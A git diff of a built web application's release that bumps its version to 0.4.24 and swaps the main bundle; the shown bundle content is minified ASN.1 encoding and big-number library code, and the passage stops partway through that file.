diff --git a/404.html b/404.html
index 017be0a..f6ef152 100644
--- a/404.html
+++ b/404.html
@@ -17,6 +17,6 @@
 <style>.mat-app-background{background-color:#f5f5f5;color:#000000de}html,body{margin:0;padding:0;height:100%;font-family:Arial,Helvetica,sans-serif}</style><link rel="stylesheet" href="styles.867817fe2c0fc3bb.css" media="print" onload="this.media='all'"><noscript><link rel="stylesheet" href="styles.867817fe2c0fc3bb.css"></noscript></head>
 <body class="mat-app-background">
   <app-root>Loading...</app-root>
-<script src="runtime.ce287780ab9c1538.js" type="module"></script><script src="polyfills.9525c149e5556809.js" type="module"></script><script src="main.ddda873bf69435b6.js" type="module"></script>
+<script src="runtime.ce287780ab9c1538.js" type="module"></script><script src="polyfills.9525c149e5556809.js" type="module"></script><script src="main.a3fda0a7f1360b4c.js" type="module"></script>
 
 </body></html>
\ No newline at end of file
diff --git a/assets/version.json b/assets/version.json
index 7227d1e..8e4d999 100644
--- a/assets/version.json
+++ b/assets/version.json
@@ -1,3 +1,3 @@
 {
-  "version": "0.4.23"
+  "version": "0.4.24"
 }
\ No newline at end of file
diff --git a/index.html b/index.html
index 6d555dd..61f1a69 100644
--- a/index.html
+++ b/index.html
@@ -13,6 +13,6 @@
 <style>.mat-app-background{background-color:#f5f5f5;color:#000000de}html,body{margin:0;padding:0;height:100%;font-family:Arial,Helvetica,sans-serif}</style><link rel="stylesheet" href="styles.867817fe2c0fc3bb.css" media="print" onload="this.media='all'"><noscript><link rel="stylesheet" href="styles.867817fe2c0fc3bb.css"></noscript></head>
 <body class="mat-app-background">
   <app-root>Loading...</app-root>
-<script src="runtime.ce287780ab9c1538.js" type="module"></script><script src="polyfills.9525c149e5556809.js" type="module"></script><script src="main.ddda873bf69435b6.js" type="module"></script>
+<script src="runtime.ce287780ab9c1538.js" type="module"></script><script src="polyfills.9525c149e5556809.js" type="module"></script><script src="main.a3fda0a7f1360b4c.js" type="module"></script>
 
 </body></html>
\ No newline at end of file
diff --git a/main.ddda873bf69435b6.js b/main.a3fda0a7f1360b4c.js
similarity index 83%
rename from main.ddda873bf69435b6.js
rename to main.a3fda0a7f1360b4c.js
index d75a4a2..b427b68 100644
--- a/main.ddda873bf69435b6.js
+++ b/main.a3fda0a7f1360b4c.js
@@ -1 +1 @@
-var vbt=Object.defineProperty,Abt=Object.defineProperties,Tbt=Object.getOwnPropertyDescriptors,JT=Object.getOwnPropertySymbols,XZ=Object.prototype.hasOwnProperty,YZ=Object.prototype.propertyIsEnumerable,Lo=Math.pow,KZ=(Pe,we,de)=>we in Pe?vbt(Pe,we,{enumerable:!0,configurable:!0,writable:!0,value:de}):Pe[we]=de,ZT=(Pe,we)=>{for(var de in we||(we={}))XZ.call(we,de)&&KZ(Pe,de,we[de]);if(JT)for(var de of JT(we))YZ.call(we,de)&&KZ(Pe,de,we[de]);return Pe},L7=(Pe,we)=>Abt(Pe,Tbt(we)),JZ=(Pe,we)=>{var de={};for(var ie in Pe)XZ.call(Pe,ie)&&we.indexOf(ie)<0&&(de[ie]=Pe[ie]);if(null!=Pe&&JT)for(var ie of JT(Pe))we.indexOf(ie)<0&&YZ.call(Pe,ie)&&(de[ie]=Pe[ie]);return de};(self.webpackChunkttmodeler=self.webpackChunkttmodeler||[]).push([[179],{7758:(Pe,we,de)=>{"use strict";const ie=we;ie.bignum=de(9831),ie.define=de(4150).define,ie.base=de(3784),ie.constants=de(8482),ie.decoders=de(4917),ie.encoders=de(6530)},4150:(Pe,we,de)=>{"use strict";const ie=de(6530),j=de(4917),$=de(2270);function I(Q,F){this.name=Q,this.body=F,this.decoders={},this.encoders={}}we.define=function(F,E){return new I(F,E)},I.prototype._createNamed=function(F){const E=this.name;function g(b){this._initNamed(b,E)}return $(g,F),g.prototype._initNamed=function(_,y){F.call(this,_,y)},new g(this)},I.prototype._getDecoder=function(F){return this.decoders.hasOwnProperty(F=F||"der")||(this.decoders[F]=this._createNamed(j[F])),this.decoders[F]},I.prototype.decode=function(F,E,g){return this._getDecoder(E).decode(F,g)},I.prototype._getEncoder=function(F){return this.encoders.hasOwnProperty(F=F||"der")||(this.encoders[F]=this._createNamed(ie[F])),this.encoders[F]},I.prototype.encode=function(F,E,g){return this._getEncoder(E).encode(F,g)}},216:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(1317).b,$=de(9173).Buffer;function ae(Q,F){j.call(this,F),$.isBuffer(Q)?(this.base=Q,this.offset=0,this.length=Q.length):this.error("Input not Buffer")}function I(Q,F){if(Array.isArray(Q))this.length=0,this.value=Q.map(function(E){return I.isEncoderBuffer(E)||(E=new I(E,F)),this.length+=E.length,E},this);else if("number"==typeof Q){if(!(0<=Q&&Q<=255))return F.error("non-byte EncoderBuffer value");this.value=Q,this.length=1}else if("string"==typeof Q)this.value=Q,this.length=$.byteLength(Q);else{if(!$.isBuffer(Q))return F.error("Unsupported type: "+typeof Q);this.value=Q,this.length=Q.length}}ie(ae,j),we.C=ae,ae.isDecoderBuffer=function(F){return F instanceof ae||"object"==typeof F&&$.isBuffer(F.base)&&"DecoderBuffer"===F.constructor.name&&"number"==typeof F.offset&&"number"==typeof F.length&&"function"==typeof F.save&&"function"==typeof F.restore&&"function"==typeof F.isEmpty&&"function"==typeof F.readUInt8&&"function"==typeof F.skip&&"function"==typeof F.raw},ae.prototype.save=function(){return{offset:this.offset,reporter:j.prototype.save.call(this)}},ae.prototype.restore=function(F){const E=new ae(this.base);return E.offset=F.offset,E.length=this.offset,this.offset=F.offset,j.prototype.restore.call(this,F.reporter),E},ae.prototype.isEmpty=function(){return this.offset===this.length},ae.prototype.readUInt8=function(F){return this.offset+1<=this.length?this.base.readUInt8(this.offset++,!0):this.error(F||"DecoderBuffer overrun")},ae.prototype.skip=function(F,E){if(!(this.offset+F<=this.length))return this.error(E||"DecoderBuffer overrun");const g=new ae(this.base);return g._reporterState=this._reporterState,g.offset=this.offset,g.length=this.offset+F,this.offset+=F,g},ae.prototype.raw=function(F){return this.base.slice(F?F.offset:this.offset,this.length)},we.R=I,I.isEncoderBuffer=function(F){return F instanceof I||"object"==typeof F&&"EncoderBuffer"===F.constructor.name&&"number"==typeof F.length&&"function"==typeof F.join},I.prototype.join=function(F,E){return F||(F=$.alloc(this.length)),E||(E=0),0===this.length||(Array.isArray(this.value)?this.value.forEach(function(g){g.join(F,E),E+=g.length}):("number"==typeof this.value?F[E]=this.value:"string"==typeof this.value?F.write(this.value,E):$.isBuffer(this.value)&&this.value.copy(F,E),E+=this.length)),F}},3784:(Pe,we,de)=>{"use strict";const ie=we;ie.Reporter=de(1317).b,ie.DecoderBuffer=de(216).C,ie.EncoderBuffer=de(216).R,ie.Node=de(2108)},2108:(Pe,we,de)=>{"use strict";const ie=de(1317).b,j=de(216).R,$=de(216).C,ae=de(490),I=["seq","seqof","set","setof","objid","bool","gentime","utctime","null_","enum","int","objDesc","bitstr","bmpstr","charstr","genstr","graphstr","ia5str","iso646str","numstr","octstr","printstr","t61str","unistr","utf8str","videostr"],Q=["key","obj","use","optional","explicit","implicit","def","choice","any","contains"].concat(I);function E(b,_,y){const M={};this._baseState=M,M.name=y,M.enc=b,M.parent=_||null,M.children=null,M.tag=null,M.args=null,M.reverseArgs=null,M.choice=null,M.optional=!1,M.any=!1,M.obj=!1,M.use=null,M.useDecoder=null,M.key=null,M.default=null,M.explicit=null,M.implicit=null,M.contains=null,M.parent||(M.children=[],this._wrap())}Pe.exports=E;const g=["enc","parent","children","tag","args","reverseArgs","choice","optional","any","obj","use","alteredUse","key","default","explicit","implicit","contains"];E.prototype.clone=function(){const _=this._baseState,y={};g.forEach(function(p){y[p]=_[p]});const M=new this.constructor(y.parent);return M._baseState=y,M},E.prototype._wrap=function(){const _=this._baseState;Q.forEach(function(y){this[y]=function(){const p=new this.constructor(this);return _.children.push(p),p[y].apply(p,arguments)}},this)},E.prototype._init=function(_){const y=this._baseState;ae(null===y.parent),_.call(this),y.children=y.children.filter(function(M){return M._baseState.parent===this},this),ae.equal(y.children.length,1,"Root node can have only one child")},E.prototype._useArgs=function(_){const y=this._baseState,M=_.filter(function(p){return p instanceof this.constructor},this);_=_.filter(function(p){return!(p instanceof this.constructor)},this),0!==M.length&&(ae(null===y.children),y.children=M,M.forEach(function(p){p._baseState.parent=this},this)),0!==_.length&&(ae(null===y.args),y.args=_,y.reverseArgs=_.map(function(p){if("object"!=typeof p||p.constructor!==Object)return p;const D={};return Object.keys(p).forEach(function(w){w==(0|w)&&(w|=0),D[p[w]]=w}),D}))},["_peekTag","_decodeTag","_use","_decodeStr","_decodeObjid","_decodeTime","_decodeNull","_decodeInt","_decodeBool","_decodeList","_encodeComposite","_encodeStr","_encodeObjid","_encodeTime","_encodeNull","_encodeInt","_encodeBool"].forEach(function(b){E.prototype[b]=function(){throw new Error(b+" not implemented for encoding: "+this._baseState.enc)}}),I.forEach(function(b){E.prototype[b]=function(){const y=this._baseState,M=Array.prototype.slice.call(arguments);return ae(null===y.tag),y.tag=b,this._useArgs(M),this}}),E.prototype.use=function(_){ae(_);const y=this._baseState;return ae(null===y.use),y.use=_,this},E.prototype.optional=function(){return this._baseState.optional=!0,this},E.prototype.def=function(_){const y=this._baseState;return ae(null===y.default),y.default=_,y.optional=!0,this},E.prototype.explicit=function(_){const y=this._baseState;return ae(null===y.explicit&&null===y.implicit),y.explicit=_,this},E.prototype.implicit=function(_){const y=this._baseState;return ae(null===y.explicit&&null===y.implicit),y.implicit=_,this},E.prototype.obj=function(){const _=this._baseState,y=Array.prototype.slice.call(arguments);return _.obj=!0,0!==y.length&&this._useArgs(y),this},E.prototype.key=function(_){const y=this._baseState;return ae(null===y.key),y.key=_,this},E.prototype.any=function(){return this._baseState.any=!0,this},E.prototype.choice=function(_){const y=this._baseState;return ae(null===y.choice),y.choice=_,this._useArgs(Object.keys(_).map(function(M){return _[M]})),this},E.prototype.contains=function(_){const y=this._baseState;return ae(null===y.use),y.contains=_,this},E.prototype._decode=function(_,y){const M=this._baseState;if(null===M.parent)return _.wrapResult(M.children[0]._decode(_,y));let x,p=M.default,D=!0,w=null;if(null!==M.key&&(w=_.enterKey(M.key)),M.optional){let S=null;if(null!==M.explicit?S=M.explicit:null!==M.implicit?S=M.implicit:null!==M.tag&&(S=M.tag),null!==S||M.any){if(D=this._peekTag(_,S,M.any),_.isError(D))return D}else{const O=_.save();try{null===M.choice?this._decodeGeneric(M.tag,_,y):this._decodeChoice(_,y),D=!0}catch(U){D=!1}_.restore(O)}}if(M.obj&&D&&(x=_.enterObject()),D){if(null!==M.explicit){const O=this._decodeTag(_,M.explicit);if(_.isError(O))return O;_=O}const S=_.offset;if(null===M.use&&null===M.choice){let O;M.any&&(O=_.save());const U=this._decodeTag(_,null!==M.implicit?M.implicit:M.tag,M.any);if(_.isError(U))return U;M.any?p=_.raw(O):_=U}if(y&&y.track&&null!==M.tag&&y.track(_.path(),S,_.length,"tagged"),y&&y.track&&null!==M.tag&&y.track(_.path(),_.offset,_.length,"content"),M.any||(p=null===M.choice?this._decodeGeneric(M.tag,_,y):this._decodeChoice(_,y)),_.isError(p))return p;if(!M.any&&null===M.choice&&null!==M.children&&M.children.forEach(function(U){U._decode(_,y)}),M.contains&&("octstr"===M.tag||"bitstr"===M.tag)){const O=new $(p);p=this._getUse(M.contains,_._reporterState.obj)._decode(O,y)}}return M.obj&&D&&(p=_.leaveObject(x)),null===M.key||null===p&&!0!==D?null!==w&&_.exitKey(w):_.leaveKey(w,M.key,p),p},E.prototype._decodeGeneric=function(_,y,M){const p=this._baseState;return"seq"===_||"set"===_?null:"seqof"===_||"setof"===_?this._decodeList(y,_,p.args[0],M):/str$/.test(_)?this._decodeStr(y,_,M):"objid"===_&&p.args?this._decodeObjid(y,p.args[0],p.args[1],M):"objid"===_?this._decodeObjid(y,null,null,M):"gentime"===_||"utctime"===_?this._decodeTime(y,_,M):"null_"===_?this._decodeNull(y,M):"bool"===_?this._decodeBool(y,M):"objDesc"===_?this._decodeStr(y,_,M):"int"===_||"enum"===_?this._decodeInt(y,p.args&&p.args[0],M):null!==p.use?this._getUse(p.use,y._reporterState.obj)._decode(y,M):y.error("unknown tag: "+_)},E.prototype._getUse=function(_,y){const M=this._baseState;return M.useDecoder=this._use(_,y),ae(null===M.useDecoder._baseState.parent),M.useDecoder=M.useDecoder._baseState.children[0],M.implicit!==M.useDecoder._baseState.implicit&&(M.useDecoder=M.useDecoder.clone(),M.useDecoder._baseState.implicit=M.implicit),M.useDecoder},E.prototype._decodeChoice=function(_,y){const M=this._baseState;let p=null,D=!1;return Object.keys(M.choice).some(function(w){const x=_.save(),S=M.choice[w];try{const O=S._decode(_,y);if(_.isError(O))return!1;p={type:w,value:O},D=!0}catch(O){return _.restore(x),!1}return!0},this),D?p:_.error("Choice not matched")},E.prototype._createEncoderBuffer=function(_){return new j(_,this.reporter)},E.prototype._encode=function(_,y,M){const p=this._baseState;if(null!==p.default&&p.default===_)return;const D=this._encodeValue(_,y,M);return void 0===D||this._skipDefault(D,y,M)?void 0:D},E.prototype._encodeValue=function(_,y,M){const p=this._baseState;if(null===p.parent)return p.children[0]._encode(_,y||new ie);let D=null;if(this.reporter=y,p.optional&&void 0===_){if(null===p.default)return;_=p.default}let w=null,x=!1;if(p.any)D=this._createEncoderBuffer(_);else if(p.choice)D=this._encodeChoice(_,y);else if(p.contains)w=this._getUse(p.contains,M)._encode(_,y),x=!0;else if(p.children)w=p.children.map(function(S){if("null_"===S._baseState.tag)return S._encode(null,y,_);if(null===S._baseState.key)return y.error("Child should have a key");const O=y.enterKey(S._baseState.key);if("object"!=typeof _)return y.error("Child expected, but input is not object");const U=S._encode(_[S._baseState.key],y,_);return y.leaveKey(O),U},this).filter(function(S){return S}),w=this._createEncoderBuffer(w);else if("seqof"===p.tag||"setof"===p.tag){if(!p.args||1!==p.args.length)return y.error("Too many args for : "+p.tag);if(!Array.isArray(_))return y.error("seqof/setof, but data is not Array");const S=this.clone();S._baseState.implicit=null,w=this._createEncoderBuffer(_.map(function(O){return this._getUse(this._baseState.args[0],_)._encode(O,y)},S))}else null!==p.use?D=this._getUse(p.use,M)._encode(_,y):(w=this._encodePrimitive(p.tag,_),x=!0);if(!p.any&&null===p.choice){const S=null!==p.implicit?p.implicit:p.tag,O=null===p.implicit?"universal":"context";null===S?null===p.use&&y.error("Tag could be omitted only for .use()"):null===p.use&&(D=this._encodeComposite(S,x,O,w))}return null!==p.explicit&&(D=this._encodeComposite(p.explicit,!1,"context",D)),D},E.prototype._encodeChoice=function(_,y){const M=this._baseState,p=M.choice[_.type];return p||ae(!1,_.type+" not found in "+JSON.stringify(Object.keys(M.choice))),p._encode(_.value,y)},E.prototype._encodePrimitive=function(_,y){const M=this._baseState;if(/str$/.test(_))return this._encodeStr(y,_);if("objid"===_&&M.args)return this._encodeObjid(y,M.reverseArgs[0],M.args[1]);if("objid"===_)return this._encodeObjid(y,null,null);if("gentime"===_||"utctime"===_)return this._encodeTime(y,_);if("null_"===_)return this._encodeNull();if("int"===_||"enum"===_)return this._encodeInt(y,M.args&&M.reverseArgs[0]);if("bool"===_)return this._encodeBool(y);if("objDesc"===_)return this._encodeStr(y,_);throw new Error("Unsupported tag: "+_)},E.prototype._isNumstr=function(_){return/^[0-9 ]*$/.test(_)},E.prototype._isPrintstr=function(_){return/^[A-Za-z0-9 '()+,-./:=?]*$/.test(_)}},1317:(Pe,we,de)=>{"use strict";const ie=de(2270);function j(ae){this._reporterState={obj:null,path:[],options:ae||{},errors:[]}}function $(ae,I){this.path=ae,this.rethrow(I)}we.b=j,j.prototype.isError=function(I){return I instanceof $},j.prototype.save=function(){const I=this._reporterState;return{obj:I.obj,pathLen:I.path.length}},j.prototype.restore=function(I){const Q=this._reporterState;Q.obj=I.obj,Q.path=Q.path.slice(0,I.pathLen)},j.prototype.enterKey=function(I){return this._reporterState.path.push(I)},j.prototype.exitKey=function(I){const Q=this._reporterState;Q.path=Q.path.slice(0,I-1)},j.prototype.leaveKey=function(I,Q,F){const E=this._reporterState;this.exitKey(I),null!==E.obj&&(E.obj[Q]=F)},j.prototype.path=function(){return this._reporterState.path.join("/")},j.prototype.enterObject=function(){const I=this._reporterState,Q=I.obj;return I.obj={},Q},j.prototype.leaveObject=function(I){const Q=this._reporterState,F=Q.obj;return Q.obj=I,F},j.prototype.error=function(I){let Q;const F=this._reporterState,E=I instanceof $;if(Q=E?I:new $(F.path.map(function(g){return"["+JSON.stringify(g)+"]"}).join(""),I.message||I,I.stack),!F.options.partial)throw Q;return E||F.errors.push(Q),Q},j.prototype.wrapResult=function(I){const Q=this._reporterState;return Q.options.partial?{result:this.isError(I)?null:I,errors:Q.errors}:I},ie($,Error),$.prototype.rethrow=function(I){if(this.message=I+" at: "+(this.path||"(shallow)"),Error.captureStackTrace&&Error.captureStackTrace(this,$),!this.stack)try{throw new Error(this.message)}catch(Q){this.stack=Q.stack}return this}},6629:(Pe,we)=>{"use strict";function de(ie){const j={};return Object.keys(ie).forEach(function($){(0|$)==$&&($|=0),j[ie[$]]=$}),j}we.tagClass={0:"universal",1:"application",2:"context",3:"private"},we.tagClassByName=de(we.tagClass),we.tag={0:"end",1:"bool",2:"int",3:"bitstr",4:"octstr",5:"null_",6:"objid",7:"objDesc",8:"external",9:"real",10:"enum",11:"embed",12:"utf8str",13:"relativeOid",16:"seq",17:"set",18:"numstr",19:"printstr",20:"t61str",21:"videostr",22:"ia5str",23:"utctime",24:"gentime",25:"graphstr",26:"iso646str",27:"genstr",28:"unistr",29:"charstr",30:"bmpstr"},we.tagByName=de(we.tag)},8482:(Pe,we,de)=>{"use strict";const ie=we;ie._reverse=function($){const ae={};return Object.keys($).forEach(function(I){(0|I)==I&&(I|=0),ae[$[I]]=I}),ae},ie.der=de(6629)},6948:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(9831),$=de(216).C,ae=de(2108),I=de(6629);function Q(b){this.enc="der",this.name=b.name,this.entity=b,this.tree=new F,this.tree._init(b.body)}function F(b){ae.call(this,"der",b)}function E(b,_){let y=b.readUInt8(_);if(b.isError(y))return y;const M=I.tagClass[y>>6],p=0==(32&y);if(31==(31&y)){let w=y;for(y=0;128==(128&w);){if(w=b.readUInt8(_),b.isError(w))return w;y<<=7,y|=127&w}}else y&=31;return{cls:M,primitive:p,tag:y,tagStr:I.tag[y]}}function g(b,_,y){let M=b.readUInt8(y);if(b.isError(M))return M;if(!_&&128===M)return null;if(0==(128&M))return M;const p=127&M;if(p>4)return b.error("length octect is too long");M=0;for(let D=0;D<p;D++){M<<=8;const w=b.readUInt8(y);if(b.isError(w))return w;M|=w}return M}Pe.exports=Q,Q.prototype.decode=function(_,y){return $.isDecoderBuffer(_)||(_=new $(_,y)),this.tree._decode(_,y)},ie(F,ae),F.prototype._peekTag=function(_,y,M){if(_.isEmpty())return!1;const p=_.save(),D=E(_,'Failed to peek tag: "'+y+'"');return _.isError(D)?D:(_.restore(p),D.tag===y||D.tagStr===y||D.tagStr+"of"===y||M)},F.prototype._decodeTag=function(_,y,M){const p=E(_,'Failed to decode tag of "'+y+'"');if(_.isError(p))return p;let D=g(_,p.primitive,'Failed to get length of "'+y+'"');if(_.isError(D))return D;if(!M&&p.tag!==y&&p.tagStr!==y&&p.tagStr+"of"!==y)return _.error('Failed to match tag: "'+y+'"');if(p.primitive||null!==D)return _.skip(D,'Failed to match body of: "'+y+'"');const w=_.save(),x=this._skipUntilEnd(_,'Failed to skip indefinite length body: "'+this.tag+'"');return _.isError(x)?x:(D=_.offset-w.offset,_.restore(w),_.skip(D,'Failed to match body of: "'+y+'"'))},F.prototype._skipUntilEnd=function(_,y){for(;;){const M=E(_,y);if(_.isError(M))return M;const p=g(_,M.primitive,y);if(_.isError(p))return p;let D;if(D=M.primitive||null!==p?_.skip(p):this._skipUntilEnd(_,y),_.isError(D))return D;if("end"===M.tagStr)break}},F.prototype._decodeList=function(_,y,M,p){const D=[];for(;!_.isEmpty();){const w=this._peekTag(_,"end");if(_.isError(w))return w;const x=M.decode(_,"der",p);if(_.isError(x)&&w)break;D.push(x)}return D},F.prototype._decodeStr=function(_,y){if("bitstr"===y){const M=_.readUInt8();return _.isError(M)?M:{unused:M,data:_.raw()}}if("bmpstr"===y){const M=_.raw();if(M.length%2==1)return _.error("Decoding of string type: bmpstr length mismatch");let p="";for(let D=0;D<M.length/2;D++)p+=String.fromCharCode(M.readUInt16BE(2*D));return p}if("numstr"===y){const M=_.raw().toString("ascii");return this._isNumstr(M)?M:_.error("Decoding of string type: numstr unsupported characters")}if("octstr"===y)return _.raw();if("objDesc"===y)return _.raw();if("printstr"===y){const M=_.raw().toString("ascii");return this._isPrintstr(M)?M:_.error("Decoding of string type: printstr unsupported characters")}return/str$/.test(y)?_.raw().toString():_.error("Decoding of string type: "+y+" unsupported")},F.prototype._decodeObjid=function(_,y,M){let p;const D=[];let w=0,x=0;for(;!_.isEmpty();)x=_.readUInt8(),w<<=7,w|=127&x,0==(128&x)&&(D.push(w),w=0);if(128&x&&D.push(w),p=M?D:[D[0]/40|0,D[0]%40].concat(D.slice(1)),y){let U=y[p.join(" ")];void 0===U&&(U=y[p.join(".")]),void 0!==U&&(p=U)}return p},F.prototype._decodeTime=function(_,y){const M=_.raw().toString();let p,D,w,x,S,O;if("gentime"===y)p=0|M.slice(0,4),D=0|M.slice(4,6),w=0|M.slice(6,8),x=0|M.slice(8,10),S=0|M.slice(10,12),O=0|M.slice(12,14);else{if("utctime"!==y)return _.error("Decoding "+y+" time is not supported yet");p=0|M.slice(0,2),D=0|M.slice(2,4),w=0|M.slice(4,6),x=0|M.slice(6,8),S=0|M.slice(8,10),O=0|M.slice(10,12),p=p<70?2e3+p:1900+p}return Date.UTC(p,D-1,w,x,S,O,0)},F.prototype._decodeNull=function(){return null},F.prototype._decodeBool=function(_){const y=_.readUInt8();return _.isError(y)?y:0!==y},F.prototype._decodeInt=function(_,y){const M=_.raw();let p=new j(M);return y&&(p=y[p.toString(10)]||p),p},F.prototype._use=function(_,y){return"function"==typeof _&&(_=_(y)),_._getDecoder("der").tree}},4917:(Pe,we,de)=>{"use strict";const ie=we;ie.der=de(6948),ie.pem=de(1805)},1805:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(9173).Buffer,$=de(6948);function ae(I){$.call(this,I),this.enc="pem"}ie(ae,$),Pe.exports=ae,ae.prototype.decode=function(Q,F){const E=Q.toString().split(/[\r\n]+/g),g=F.label.toUpperCase(),b=/^-----(BEGIN|END) ([^-]+)-----$/;let _=-1,y=-1;for(let D=0;D<E.length;D++){const w=E[D].match(b);if(null!==w&&w[2]===g){if(-1!==_){if("END"!==w[1])break;y=D;break}if("BEGIN"!==w[1])break;_=D}}if(-1===_||-1===y)throw new Error("PEM section not found for: "+g);const M=E.slice(_+1,y).join("");M.replace(/[^a-z0-9+/=]+/gi,"");const p=j.from(M,"base64");return $.prototype.decode.call(this,p,F)}},8018:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(9173).Buffer,$=de(2108),ae=de(6629);function I(g){this.enc="der",this.name=g.name,this.entity=g,this.tree=new Q,this.tree._init(g.body)}function Q(g){$.call(this,"der",g)}function F(g){return g<10?"0"+g:g}Pe.exports=I,I.prototype.encode=function(b,_){return this.tree._encode(b,_).join()},ie(Q,$),Q.prototype._encodeComposite=function(b,_,y,M){const p=function E(g,b,_,y){let M;if("seqof"===g?g="seq":"setof"===g&&(g="set"),ae.tagByName.hasOwnProperty(g))M=ae.tagByName[g];else{if("number"!=typeof g||(0|g)!==g)return y.error("Unknown tag: "+g);M=g}return M>=31?y.error("Multi-octet tag encoding unsupported"):(b||(M|=32),M|=ae.tagClassByName[_||"universal"]<<6,M)}(b,_,y,this.reporter);if(M.length<128){const x=j.alloc(2);return x[0]=p,x[1]=M.length,this._createEncoderBuffer([x,M])}let D=1;for(let x=M.length;x>=256;x>>=8)D++;const w=j.alloc(2+D);w[0]=p,w[1]=128|D;for(let x=1+D,S=M.length;S>0;x--,S>>=8)w[x]=255&S;return this._createEncoderBuffer([w,M])},Q.prototype._encodeStr=function(b,_){if("bitstr"===_)return this._createEncoderBuffer([0|b.unused,b.data]);if("bmpstr"===_){const y=j.alloc(2*b.length);for(let M=0;M<b.length;M++)y.writeUInt16BE(b.charCodeAt(M),2*M);return this._createEncoderBuffer(y)}return"numstr"===_?this._isNumstr(b)?this._createEncoderBuffer(b):this.reporter.error("Encoding of string type: numstr supports only digits and space"):"printstr"===_?this._isPrintstr(b)?this._createEncoderBuffer(b):this.reporter.error("Encoding of string type: printstr supports only latin upper and lower case letters, digits, space, apostrophe, left and rigth parenthesis, plus sign, comma, hyphen, dot, slash, colon, equal sign, question mark"):/str$/.test(_)||"objDesc"===_?this._createEncoderBuffer(b):this.reporter.error("Encoding of string type: "+_+" unsupported")},Q.prototype._encodeObjid=function(b,_,y){if("string"==typeof b){if(!_)return this.reporter.error("string objid given, but no values map found");if(!_.hasOwnProperty(b))return this.reporter.error("objid not found in values map");b=_[b].split(/[\s.]+/g);for(let w=0;w<b.length;w++)b[w]|=0}else if(Array.isArray(b)){b=b.slice();for(let w=0;w<b.length;w++)b[w]|=0}if(!Array.isArray(b))return this.reporter.error("objid() should be either array or string, got: "+JSON.stringify(b));if(!y){if(b[1]>=40)return this.reporter.error("Second objid identifier OOB");b.splice(0,2,40*b[0]+b[1])}let M=0;for(let w=0;w<b.length;w++){let x=b[w];for(M++;x>=128;x>>=7)M++}const p=j.alloc(M);let D=p.length-1;for(let w=b.length-1;w>=0;w--){let x=b[w];for(p[D--]=127&x;(x>>=7)>0;)p[D--]=128|127&x}return this._createEncoderBuffer(p)},Q.prototype._encodeTime=function(b,_){let y;const M=new Date(b);return"gentime"===_?y=[F(M.getUTCFullYear()),F(M.getUTCMonth()+1),F(M.getUTCDate()),F(M.getUTCHours()),F(M.getUTCMinutes()),F(M.getUTCSeconds()),"Z"].join(""):"utctime"===_?y=[F(M.getUTCFullYear()%100),F(M.getUTCMonth()+1),F(M.getUTCDate()),F(M.getUTCHours()),F(M.getUTCMinutes()),F(M.getUTCSeconds()),"Z"].join(""):this.reporter.error("Encoding "+_+" time is not supported yet"),this._encodeStr(y,"octstr")},Q.prototype._encodeNull=function(){return this._createEncoderBuffer("")},Q.prototype._encodeInt=function(b,_){if("string"==typeof b){if(!_)return this.reporter.error("String int or enum given, but no values map");if(!_.hasOwnProperty(b))return this.reporter.error("Values map doesn't contain: "+JSON.stringify(b));b=_[b]}if("number"!=typeof b&&!j.isBuffer(b)){const p=b.toArray();!b.sign&&128&p[0]&&p.unshift(0),b=j.from(p)}if(j.isBuffer(b)){let p=b.length;0===b.length&&p++;const D=j.alloc(p);return b.copy(D),0===b.length&&(D[0]=0),this._createEncoderBuffer(D)}if(b<128)return this._createEncoderBuffer(b);if(b<256)return this._createEncoderBuffer([0,b]);let y=1;for(let p=b;p>=256;p>>=8)y++;const M=new Array(y);for(let p=M.length-1;p>=0;p--)M[p]=255&b,b>>=8;return 128&M[0]&&M.unshift(0),this._createEncoderBuffer(j.from(M))},Q.prototype._encodeBool=function(b){return this._createEncoderBuffer(b?255:0)},Q.prototype._use=function(b,_){return"function"==typeof b&&(b=b(_)),b._getEncoder("der").tree},Q.prototype._skipDefault=function(b,_,y){const M=this._baseState;let p;if(null===M.default)return!1;const D=b.join();if(void 0===M.defaultBuffer&&(M.defaultBuffer=this._encodeValue(M.default,_,y).join()),D.length!==M.defaultBuffer.length)return!1;for(p=0;p<D.length;p++)if(D[p]!==M.defaultBuffer[p])return!1;return!0}},6530:(Pe,we,de)=>{"use strict";const ie=we;ie.der=de(8018),ie.pem=de(3510)},3510:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(8018);function $(ae){j.call(this,ae),this.enc="pem"}ie($,j),Pe.exports=$,$.prototype.encode=function(I,Q){const E=j.prototype.encode.call(this,I).toString("base64"),g=["-----BEGIN "+Q.label+"-----"];for(let b=0;b<E.length;b+=64)g.push(E.slice(b,b+64));return g.push("-----END "+Q.label+"-----"),g.join("\n")}},9831:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(950).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var 